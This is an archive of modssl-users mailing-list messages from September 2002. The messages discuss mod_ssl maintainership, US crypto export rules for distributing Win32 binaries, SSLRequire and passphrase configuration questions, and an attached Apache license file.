> From: Tim Tassonis [mailto:timtas@dplanet.ch]
> Sent: 25 September 2002 15:50
> To: modssl-users@modssl.org
> Subject: Maintainership of mod_ssl
> 
> 
> Hi Ralf and everybody
> 
> Wouldn't it now be about time to transfer maintainership of mod_ssl to
> somebody else (if there is anybody willing and capable available) , as
> this software is now obviously unmaintained except for important
> security
> fixes.
> 
> Ralf has done a tremendous job in providing and maintaining mod_ssl,
> but
> obviously has no more time left to actively work on it.
> 
> But there are still people (me at least) who would like to enhance
> mod_ssl
> beyond the very neccessary. Unfortunately mails with patches to do so
> are
> not even replied.
> 
> How do other people and most of all, how does Ralf think about this?
> 
> Bye
> Tim
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 17:36:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27775; Wed, 25 Sep 2002 17:35:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id RAA27734; Wed, 25 Sep 2002 17:34:39 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=lttit)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17uE3T-0005Xm-00
	for modssl-users@modssl.org; Wed, 25 Sep 2002 17:26:23 +0200
Date: Wed, 25 Sep 2002 17:26:22 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Subject: Re: Maintainership of mod_ssl
In-Reply-To: <20020925150850.GA5453@rawbyte.com>
References: 
	<20020925150850.GA5453@rawbyte.com>
X-Mailer: Sylpheed version 0.8.2 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002 08:08:50 -0700
daniel  wrote:

> 
> Part of the reson is that mod_ssl was moved into the Apache 2.0
> codebase, development has been quite active there. 
> So although 1.3 development may be necessary and useful, long term I
> think 2.0 is the way to go

Of course you are right. But at the present time, Apache 1.3 is still the
widely used Apache production server, since most modules haven't been
ported yet. I'm quite sure this situation will remain for a year or so.
That's quite a long time to wait for needed functionality.

Btw.: I'm definitely the wrong man for the job, lacking both resources and
skills to be resonsible for such an important module.

Bye
Tim
 
> 
> Cheers
> 
> Daniel
> 
> > Hi all
> > 
> > I agree, I haven't seen much movement/improvements with mod_ssl in the
> > last months and in this industry things need to get moving in order to
> > keep the software in touch with its neighbours (apache, open_ssl,
> > mod_authz_ldap to name a few) and therefore each one improving on the
> > other.  
> > 
> > If Ralf cannot afford the time then I am for someone else (like you
> > Tim) to take over the reigns (either fully or partially). It is really
> > important that users see mod_ssl constantly improving itself.
> > 
> > Best regards
> > Jose Correia
> > 
> > 
> > 
> > -----Original Message-----
> > From: Tim Tassonis [mailto:timtas@dplanet.ch]
> > Sent: 25 September 2002 15:50
> > To: modssl-users@modssl.org
> > Subject: Maintainership of mod_ssl
> > 
> > 
> > Hi Ralf and everybody
> > 
> > Wouldn't it now be about time to transfer maintainership of mod_ssl to
> > somebody else (if there is anybody willing and capable available) , as
> > this software is now obviously unmaintained except for important
> > security
> > fixes.
> > 
> > Ralf has done a tremendous job in providing and maintaining mod_ssl,
> > but
> > obviously has no more time left to actively work on it.
> > 
> > But there are still people (me at least) who would like to enhance
> > mod_ssl
> > beyond the very neccessary. Unfortunately mails with patches to do so
> > are
> > not even replied.
> > 
> > How do other people and most of all, how does Ralf think about this?
> > 
> > Bye
> > Tim
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 20:52:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03062; Wed, 25 Sep 2002 20:51:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA03042; Wed, 25 Sep 2002 20:50:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 976C44CE73D; Wed, 25 Sep 2002 20:50:34 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1294D28828; Wed, 25 Sep 2002 20:47:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.cbbanorte.com.mx id RAA28489; Wed, 25 Sep 2002 17:56:07 +0200 (MET DST)
Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202])
	by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g8PFtp505815
	for ; Wed, 25 Sep 2002 10:55:51 -0500
Received: by pernt02.cbbanorte.com.mx with Internet Mail Service (5.5.2653.19)
	id ; Wed, 25 Sep 2002 10:48:58 -0500
Message-ID: 
From: "Marco A. Zamora Cunningham" 
To: "'modssl-users@modssl.org'" 
Subject: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-Ope
	nSSL_0.9.6g-Win32.zip)
Date: Wed, 25 Sep 2002 10:48:58 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA28490
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco A. Zamora Cunningham" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff Wooley:
> But there's a reason we can't distribute crypto 
> binaries from apache.org --  if we could, we 
> would.  Guess we wait for Ralf to check up on 
> the contrib area.

Correct me if I'm wrong, but I thought that ITAR restrictions eased up about
a year ago, so OpenSSL strong crypto can now be exported with no problems
*except* to specially targeted countries like Iraq. Case in point: MSIE 6
includes strong SSL (buggy but strong) and you can download it off
microsoft.com with no restrictions. I vaguely remember downloading a strong
crypto Mozilla or Opera or something like that some months ago by just
filling in a form saying that I'm not a terrorist and I don't live in Cuba,
Iraq or such.

¿Is there anybody here on the cypherpunk lists who can clarify?

MZ
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 23:08:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA07846; Wed, 25 Sep 2002 23:07:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id XAA07837; Wed, 25 Sep 2002 23:06:50 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8PL6lmR015170
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Wed, 25 Sep 2002 17:06:48 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8PL6kFm024851
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Wed, 25 Sep 2002 17:06:47 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8PL6i2x024844
	for ; Wed, 25 Sep 2002 17:06:45 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: certificate + network ACL + passwords problem? 
References: <30507.1032735209@elisabeth.cfrq.net>
In-reply-to: Your message of "Sun, 22 Sep 2002 18:53:29 -0400".
	 <30507.1032735209@elisabeth.cfrq.net> 
From: Harald Koch 
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <24841.1032988003.1@elisabeth.cfrq.net>
Date: Wed, 25 Sep 2002 17:06:43 -0400
Message-ID: <24843.1032988003@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I was once rumoured to have written:
>     SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 and %{SSL_CLIENT_VERIFY} eq "SUCCESS" )
> 
>     #   Allow any of certs, network access or basic auth
>     Satisfy                 any
> 
>     #   Network Access Control
>     Order                   deny,allow
>     Deny                    from all
>     Allow                   from 127.0.0.1
>     Allow                   from 199.85.99.0/24


FWIW, I just figured out that if I move the network access control into
the SSLRequire line, then I get my desired behaviour:

SSLRequire (( %{SSL_CIPHER_USEKEYSIZE} >= 128 \
		and %{SSL_CLIENT_VERIFY} eq "SUCCESS" ) \
            or ( %{REMOTE_ADDR} =~ m/^127\.0\.0\.1|199\.85\.99\.[0-9]+$/ ))


It's better than nothing, I guess :-)

-- 
Harald Koch     
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 23:26:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA08583; Wed, 25 Sep 2002 23:25:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from forest.mmhosting.com id XAA08570; Wed, 25 Sep 2002 23:24:33 +0200 (MET DST)
Received: from rkukiela (19-180.104.popsite.net [66.19.124.180])
	by onrampnetworks.com (8.10.2/8.10.2) with SMTP id g8PLZaW20089
	for ; Wed, 25 Sep 2002 16:35:37 -0500
Message-ID: <005801c264d9$eb5df780$0a01a8c0@rkukiela>
From: "Rick Kukiela" 
To: 
Subject: Is anyone doing this!?!
Date: Wed, 25 Sep 2002 16:24:22 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rick Kukiela" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I need to know if anyone else is doing this successfully... loading apache
aware ssl with multiple vhosts --- all with their own PEM passphrase on
their key files --- and each has thier own PassPhraseDialog exec: line where
it gets the password from... if you do this sucessfully, can you please send
a part of ur httpd.conf file so I can see how you are doing it, the way im
doing it is messing it up because what it ends up doing is taking the very
last occurance of the PassPhraseDialog directive and uses it for ALL of the
sites when it should us each one for each site respectively...

any help?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 03:05:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA12918; Thu, 26 Sep 2002 03:04:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA12907; Thu, 26 Sep 2002 03:03:27 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 737174CE74C; Thu, 26 Sep 2002 03:03:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 668A5286BF; Wed, 25 Sep 2002 21:39:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id VAA04116; Wed, 25 Sep 2002 21:08:53 +0200 (MET DST)
Received: from cbs7 ([192.168.1.112])
	by campbus.com (8.9.3/8.9.3) with SMTP id OAA28945
	for ; Wed, 25 Sep 2002 14:40:26 -0400
Message-ID: <000f01c264c7$0d48cea0$7001a8c0@cbs7>
From: "Ken C" 
To: 
References: 
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Wed, 25 Sep 2002 15:09:15 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken C" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You are correct in that statement.

How ever I'm still trying to clerify a few little potential snaggs.

>From what I've seen a "permit" may be required, for export / downloads to
non-US locations. "Hosting" servers may need to have the ability to deny
downloads to locations that shouldn't have it. (don't ask me, I'm just
reading this stuff)

While it has relaxed, it still appears to be full of red tape.

If anyone else is checking on this, let me know if you find any documention
that makes sense :-/

----- Original Message -----
From: "Marco A. Zamora Cunningham" 
To: 
Sent: Wednesday, September 25, 2002 11:48 AM
Subject: Crypto Export restrictions (was:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)


> Cliff Wooley:
> > But there's a reason we can't distribute crypto
> > binaries from apache.org --  if we could, we
> > would.  Guess we wait for Ralf to check up on
> > the contrib area.
>
> Correct me if I'm wrong, but I thought that ITAR restrictions eased up
about
> a year ago, so OpenSSL strong crypto can now be exported with no problems
> *except* to specially targeted countries like Iraq. Case in point: MSIE 6
> includes strong SSL (buggy but strong) and you can download it off
> microsoft.com with no restrictions. I vaguely remember downloading a
strong
> crypto Mozilla or Opera or something like that some months ago by just
> filling in a form saying that I'm not a terrorist and I don't live in
Cuba,
> Iraq or such.
>
> ¿Is there anybody here on the cypherpunk lists who can clarify?
>
> MZ
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 03:21:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA13675; Thu, 26 Sep 2002 03:20:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id DAA13664; Thu, 26 Sep 2002 03:19:40 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8Q1F7YP000652
	for ; Wed, 25 Sep 2002 21:15:12 -0400
Date: Wed, 25 Sep 2002 21:15:06 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
In-Reply-To: <000f01c264c7$0d48cea0$7001a8c0@cbs7>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002, Ken C wrote:

> >From what I've seen a "permit" may be required, for export / downloads to
> non-US locations. "Hosting" servers may need to have the ability to deny
> downloads to locations that shouldn't have it. (don't ask me, I'm just
> reading this stuff)
> While it has relaxed, it still appears to be full of red tape.

That sounds about like my understanding, yeah.  Note also that the rules
for binary distributions are different from those of source distributions
for some reason.  Sheesh.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 03:37:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA13942; Thu, 26 Sep 2002 03:36:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id DAA13931; Thu, 26 Sep 2002 03:35:22 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id VAA29436
	for ; Wed, 25 Sep 2002 21:06:56 -0400
Message-ID: <000f01c264fc$8f49a660$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References: 
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Wed, 25 Sep 2002 21:32:16 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Everyone have their reading glasses on?

In an effort to get to the meat of the issue without all the "mind numbing"
legal double talk I made a couple of phone calls.
(I figured what the hell, they take what they want from my income, I'll make
them regret answering the phone)

I appears that since the module is going to be "free" to everyone who
wants/needs it the only thing that "may" need to be done is notifying them
what the url is,
and provide a disclamer warning about export regulations.

I still have a few things to read through though.

I may need some information such as who wrote the app (company, etc). *ideas
anyone??
(I'm new to OpenSSL and the various modules so excuse me if the answer to
that is obvious)

Once I get this figured out, the module should have an additional 1-14
download locations. (if desired)

----- Original Message -----
From: "Cliff Woolley" 
To: 
Sent: Wednesday, September 25, 2002 9:15 PM
Subject: Re: Crypto Export restrictions (was:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)


> On Wed, 25 Sep 2002, Ken C wrote:
>
> > >From what I've seen a "permit" may be required, for export / downloads
to
> > non-US locations. "Hosting" servers may need to have the ability to deny
> > downloads to locations that shouldn't have it. (don't ask me, I'm just
> > reading this stuff)
> > While it has relaxed, it still appears to be full of red tape.
>
> That sounds about like my understanding, yeah.  Note also that the rules
> for binary distributions are different from those of source distributions
> for some reason.  Sheesh.
>
> --Cliff
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 04:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA15163; Thu, 26 Sep 2002 04:26:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts16-srv.bellnexxia.net id EAA15157; Thu, 26 Sep 2002 04:25:13 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts16-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020926022511.ZDWO15333.tomts16-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 25 Sep 2002 22:25:11 -0400
Message-ID: <3D92700F.90801@sympatico.ca>
Date: Wed, 25 Sep 2002 22:25:19 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs>
Content-Type: multipart/mixed;
 boundary="------------030107040002090103040101"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------030107040002090103040101
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Ken Campney wrote:
> Everyone have their reading glasses on?
> 
> In an effort to get to the meat of the issue without all the "mind numbing"
> legal double talk I made a couple of phone calls.
> (I figured what the hell, they take what they want from my income, I'll make
> them regret answering the phone)
> 
> I appears that since the module is going to be "free" to everyone who
> wants/needs it the only thing that "may" need to be done is notifying them
> what the url is,
> and provide a disclamer warning about export regulations.
> 
> I still have a few things to read through though.
> 
> I may need some information such as who wrote the app (company, etc). *ideas
> anyone??
> (I'm new to OpenSSL and the various modules so excuse me if the answer to
> that is obvious)
> 
> Once I get this figured out, the module should have an additional 1-14
> download locations. (if desired)
> 

Ken,

This is great!

For what it is worth there is a disclaimer on this page that may serve 
the purpose you describe in your comments.

http://www.modssl.org/source/

A good source of names for all of the parts can be found in the 
LICENSE.TXT from the Apache 2.0.42 build - I have included it as an 
attachment.

Please let me know if there is anything else that I can do to assist 
you.  Thank you for taking the time to check on the export rules.

Chris.

--------------030107040002090103040101
Content-Type: text/plain;
 name="LICENSE.txt"
Content-Disposition: inline;
 filename="LICENSE.txt"
Content-Transfer-Encoding: 7bit

/* ====================================================================
 * The Apache Software License, Version 1.1
 *
 * Copyright (c) 2000-2002 The Apache Software Foundation.  All rights
 * reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in
 *    the documentation and/or other materials provided with the
 *    distribution.
 *
 * 3. The end-user documentation included with the redistribution,
 *    if any, must include the following acknowledgment:
 *       "This product includes software developed by the
 *        Apache Software Foundation (http://www.apache.org/)."
 *    Alternately, this acknowledgment may appear in the software itself,
 *    if and wherever such third-party acknowledgments normally appear.
 *
 * 4. The names "Apache" and "Apache Software Foundation" must
 *    not be used to endorse or promote products derived from this
 *    software without prior written permission. For written
 *    permission, please contact apache@apache.org.
 *
 * 5. Products derived from this software may not be called "Apache",
 *    nor may "Apache" appear in their name, without prior written
 *    permission of the Apache Software Foundation.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
 * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
 * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 * ====================================================================
 *
 * This software consists of voluntary contributions made by many
 * individuals on behalf of the Apache Software Foundation.  For more
 * information on the Apache Software Foundation, please see
 * .
 *
 * Portions of this software are based upon public domain software
 * originally written at the National Center for Supercomputing Applications,
 * University of Illinois, Urbana-Champaign.
 */


APACHE HTTP SERVER SUBCOMPONENTS: 

The Apache HTTP Server includes a number of subcomponents with
separate copyright notices and license terms. Your use of the source
code for the these subcomponents is subject to the terms and
conditions of the following licenses. 

For the mod_mime_magic component:

/*
 * mod_mime_magic: MIME type lookup via file magic numbers
 * Copyright (c) 1996-1997 Cisco Systems, Inc.
 *
 * This software was submitted by Cisco Systems to the Apache Group in July
 * 1997.  Future revisions and derivatives of this source code must
 * acknowledge Cisco Systems as the original contributor of this module.
 * All other licensing and usage conditions are those of the Apache Group.
 *
 * Some of this code is derived from the free version of the file command
 * originally posted to comp.sources.unix.  Copyright info for that program
 * is included below as required.
 * ---------------------------------------------------------------------------
 * - Copyright (c) Ian F. Darwin, 1987. Written by Ian F. Darwin.
 *
 * This software is not subject to any license of the American Telephone and
 * Telegraph Company or of the Regents of the University of California.
 *
 * Permission is granted to anyone to use this software for any purpose on any
 * computer system, and to alter it and redistribute it freely, subject to
 * the following restrictions:
 *
 * 1. The author is not responsible for the consequences of use of this
 * software, no matter how awful, even if they arise from flaws in it.
 *
 * 2. The origin of this software must not be misrepresented, either by
 * explicit claim or by omission.  Since few users ever read sources, credits
 * must appear in the documentation.
 *
 * 3. Altered versions must be plainly marked as such, and must not be
 * misrepresented as being the original software.  Since few users ever read
 * sources, credits must appear in the documentation.
 *
 * 4. This notice may not be removed or altered.
 * -------------------------------------------------------------------------
 *
 */


For the  modules\mappers\mod_imap.c component:

  "macmartinized" polygon code copyright 1992 by Eric Haines, erich@eye.com

For the  server\util_md5.c component:

/************************************************************************
 * NCSA HTTPd Server
 * Software Development Group
 * National Center for Supercomputing Applications
 * University of Illinois at Urbana-Champaign
 * 605 E. Springfield, Champaign, IL 61820
 * httpd@ncsa.uiuc.edu
 *
 * Copyright  (C)  1995, Board of Trustees of the University of Illinois
 *
 ************************************************************************
 *
 * md5.c: NCSA HTTPd code which uses the md5c.c RSA Code
 *
 *  Original Code Copyright (C) 1994, Jeff Hostetler, Spyglass, Inc.
 *  Portions of Content-MD5 code Copyright (C) 1993, 1994 by Carnegie Mellon
 *     University (see Copyright below).
 *  Portions of Content-MD5 code Copyright (C) 1991 Bell Communications 
 *     Research, Inc. (Bellcore) (see Copyright below).
 *  Portions extracted from mpack, John G. Myers - jgm+@cmu.edu
 *  Content-MD5 Code contributed by Martin Hamilton (martin@net.lut.ac.uk)
 *
 */


/* these portions extracted from mpack, John G. Myers - jgm+@cmu.edu */
/* (C) Copyright 1993,1994 by Carnegie Mellon University
 * All Rights Reserved.
 *
 * Permission to use, copy, modify, distribute, and sell this software
 * and its documentation for any purpose is hereby granted without
 * fee, provided that the above copyright notice appear in all copies
 * and that both that copyright notice and this permission notice
 * appear in supporting documentation, and that the name of Carnegie
 * Mellon University not be used in advertising or publicity
 * pertaining to distribution of the software without specific,
 * written prior permission.  Carnegie Mellon University makes no
 * representations about the suitability of this software for any
 * purpose.  It is provided "as is" without express or implied
 * warranty.
 *
 * CARNEGIE MELLON UNIVERSITY DISCLAIMS ALL WARRANTIES WITH REGARD TO
 * THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS, IN NO EVENT SHALL CARNEGIE MELLON UNIVERSITY BE LIABLE
 * FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
 * AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING
 * OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
 * SOFTWARE.
 */

/*
 * Copyright (c) 1991 Bell Communications Research, Inc. (Bellcore)
 *
 * Permission to use, copy, modify, and distribute this material
 * for any purpose and without fee is hereby granted, provided
 * that the above copyright notice and this permission notice
 * appear in all copies, and that the name of Bellcore not be
 * used in advertising or publicity pertaining to this
 * material without the specific, prior written permission
 * of an authorized representative of Bellcore.  BELLCORE
 * MAKES NO REPRESENTATIONS ABOUT THE ACCURACY OR SUITABILITY
 * OF THIS MATERIAL FOR ANY PURPOSE.  IT IS PROVIDED "AS IS",
 * WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES.  
 */

For the  srclib\apr\include\apr_md5.h component: 
/*
 * This is work is derived from material Copyright RSA Data Security, Inc.
 *
 * The RSA copyright statement and Licence for that original material is
 * included below. This is followed by the Apache copyright statement and
 * licence for the modifications made to that material.
 */

